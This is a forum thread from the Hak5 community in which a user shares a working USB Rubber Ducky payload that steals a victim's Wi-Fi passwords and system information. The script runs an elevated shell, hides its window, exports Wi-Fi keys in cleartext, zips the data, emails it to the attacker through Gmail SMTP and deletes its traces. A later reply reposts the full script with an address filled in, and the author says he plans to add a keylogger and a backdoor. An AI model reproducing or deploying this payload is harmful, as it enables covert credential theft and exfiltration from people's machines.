Zeta Posted April 7, 2015 Share Posted April 7, 2015 Hello fellow Hak5 fans!!! I recently have just written my first USB Rubber Ducky Payload and thought I would share it. If you spot any errors/improvements let me know . REM Author: Zeta REM Date: 4/5/15 REM Description: This program collects the computer info and wifi passwords of the victim and emails it to attackers gmail. REM------------------------OPEN & HIDE------------------------ DELAY 750 GUI r DELAY 400 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 555 ALT y DELAY 555 ENTER ENTER ALT SPACE STRING M DOWNARROW REPEAT 111 ENTER REM ----------------------COLLECT & DUMP---------------------- STRING set TEMPDIR=%systemdrive%\de-temp ENTER STRING mkdir %TEMPDIR% ENTER STRING cd %TEMPDIR% ENTER STRING netsh wlan export profile key=clear ENTER STRING set > info.txt ENTER STRING cd.. ENTER REM ---------------------------------------------ZIPPING FILE--------------------------------------------- DELAY 450 STRING echo Set objArgs = WScript.Arguments > _zipIt.vbs ENTER STRING echo InputFolder = objArgs(0) >> _zipIt.vbs ENTER STRING echo ZipFile = objArgs(1) >> _zipIt.vbs ENTER STRING echo CreateObject("Scripting.FileSystemObject").CreateTextFile(ZipFile, True).Write "PK" ^& Chr(5) ^& Chr(6) ^& String(18, vbNullChar) >> _zipIt.vbs ENTER STRING echo Set objShell = CreateObject("Shell.Application") >> _zipIt.vbs ENTER STRING echo Set source = objShell.NameSpace(InputFolder).Items >> _zipIt.vbs ENTER STRING echo objShell.NameSpace(ZipFile).CopyHere(source) >> _zipIt.vbs ENTER STRING echo wScript.Sleep 2000 >> _zipIt.vbs ENTER STRING CScript _zipIt.vbs %TEMPDIR% %systemdrive%\de-temp.zip ENTER DELAY 200 REM -----------------------------------EMAIL LOG VIA GMAIL----------------------------------- STRING powershell -command $SMTPServer = 'smtp.gmail.com'; $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('USERNAME', 'PASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'EMAIL'; $ReportEmail.To.Add('EMAIL'); $ReportEmail.Attachments.Add('%systemdrive%\de-temp.zip'); $ReportEmail.Subject = '%computername%'; $SMTPInfo.Send($ReportEmail) ENTER DELAY 100 REM ---------------------DELETE AND END--------------------- STRING RD /S /Q "%systemdrive%\de-temp" ENTER STRING TYPE nul > %systemdrive%\de-temp.zip ENTER STRING DEL /Q %systemdrive%\de-temp.zip ENTER STRING TYPE nul > %systemdrive%\_zipIt.vbs ENTER STRING DEL /Q %systemdrive%\_zipIt.vbs ENTER STRING exit ENTER Quote Link to comment Share on other sites More sharing options...
atomixgray Posted April 8, 2015 Share Posted April 8, 2015 Well done! I love this idea. Quote Link to comment Share on other sites More sharing options...
mw3demo Posted April 9, 2015 Share Posted April 9, 2015 Looks great! Will give it a test! Meanwhile, leverage off this idea with more attacks and keep that ducky quacking! :) Quote Link to comment Share on other sites More sharing options...
Zeta Posted April 9, 2015 Author Share Posted April 9, 2015 Thanks :)!!! I definitely will, I plan on adding a whole bunch of stuff. My goals #1. reconnaissance (this code plus maybe IP address info) #2. download and implement keylogger #3. Backdoor (probably enabling RDP since network access is already granted) Quote Link to comment Share on other sites More sharing options...
Bluediamond Posted June 24, 2015 Share Posted June 24, 2015 (edited) Is this great looking Payload still working? i ran it and it gets hung on UA and then sending me a email. Reds out during writing heres what i have. REM Author: ZetaREM Date: 4/5/15REM Description: This program collects the computer info and wifi passwords of the victim and emails it to attackers gmail.REM------------------------OPEN & HIDE------------------------DELAY 750GUI rDELAY 400STRING powershell Start-Process cmd -Verb runAsENTERDELAY 555ALT yDELAY 555ENTERENTERALT SPACESTRING MDOWNARROWREPEAT 111ENTERREM ----------------------COLLECT & DUMP----------------------STRING set TEMPDIR=%systemdrive%\de-tempENTERSTRING mkdir %TEMPDIR%ENTERSTRING cd %TEMPDIR%ENTERSTRING netsh wlan export profile key=clearENTERSTRING set > info.txtENTERSTRING cd..ENTERREM ---------------------------------------------ZIPPING FILE---------------------------------------------DELAY 450STRING echo Set objArgs = WScript.Arguments > _zipIt.vbsENTERSTRING echo InputFolder = objArgs(0) >> _zipIt.vbsENTERSTRING echo ZipFile = objArgs(1) >> _zipIt.vbsENTERSTRING echo CreateObject("Scripting.FileSystemObject").CreateTextFile(ZipFile, True).Write "PK" ^& Chr(5) ^& Chr(6) ^& String(18, vbNullChar) >> _zipIt.vbsENTERSTRING echo Set objShell = CreateObject("Shell.Application") >> _zipIt.vbsENTERSTRING echo Set source = objShell.NameSpace(InputFolder).Items >> _zipIt.vbsENTERSTRING echo objShell.NameSpace(ZipFile).CopyHere(source) >> _zipIt.vbsENTERSTRING echo wScript.Sleep 2000 >> _zipIt.vbsENTERSTRING CScript _zipIt.vbs %TEMPDIR% %systemdrive%\de-temp.zipENTERDELAY 200REM -----------------------------------EMAIL LOG VIA GMAIL-----------------------------------STRING powershell.exe -command $SMTPServer = 'smtp.gmail.com'; $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ishineblue', 'PWHERE'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'ishineblue@gmail.com'; $ReportEmail.To.Add('ishineblue@gmail.com'); $ReportEmail.Attachments.Add('%systemdrive%\de-temp.zip'); $ReportEmail.Subject = '%computername%'; $SMTPInfo.Send($ReportEmail)ENTERDELAY 100REM ---------------------DELETE AND END---------------------STRING RD /S /Q "%systemdrive%\de-temp"ENTERSTRING TYPE nul > %systemdrive%\de-temp.zipENTERSTRING DEL /Q %systemdrive%\de-temp.zipENTERSTRING TYPE nul > %systemdrive%\_zipIt.vbsENTERSTRING DEL /Q %systemdrive%\_zipIt.vbsENTERSTRING exitENTER Edited June 24, 2015 by Bluediamond Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.